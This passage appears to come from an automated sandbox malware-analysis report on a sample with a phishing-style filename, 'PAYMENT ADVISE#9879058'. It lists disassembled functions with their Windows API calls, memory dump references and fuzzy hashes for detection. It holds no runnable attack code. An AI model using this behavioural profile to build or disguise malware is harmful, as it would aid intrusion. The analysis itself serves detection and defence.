                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                          • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                          • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                          • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                          Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                          • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                          • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                          • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                          Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00474833
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                          • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                          • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                          • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                          Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: htonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 3832099526-2422070025
                          • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                          • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                          • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                          • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                          Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 455545452-1403004172
                          • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                          • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                          • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                          • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                          Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: InternetOpen
                          • String ID: <local>
                          • API String ID: 2038078732-4266983199
                          • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                          • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                          • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                          • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                          Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 455545452-1403004172
                          • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                          • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                          • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                          • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                          Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 455545452-1403004172
                          • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                          • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                          • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                          • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                          Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • wsprintfW.USER32 ref: 004560E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend_mallocwsprintf
                          • String ID: %d/%02d/%02d
                          • API String ID: 1262938277-328681919
                          • Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                          • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                          • Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                          • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                          Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                          • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                          • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                          • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                          Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                          • PostMessageW.USER32(00000000), ref: 00442247
                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                          • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                          • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                          • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                          Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                          Download Yara Rule
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                            • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                          • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                          • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                          • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E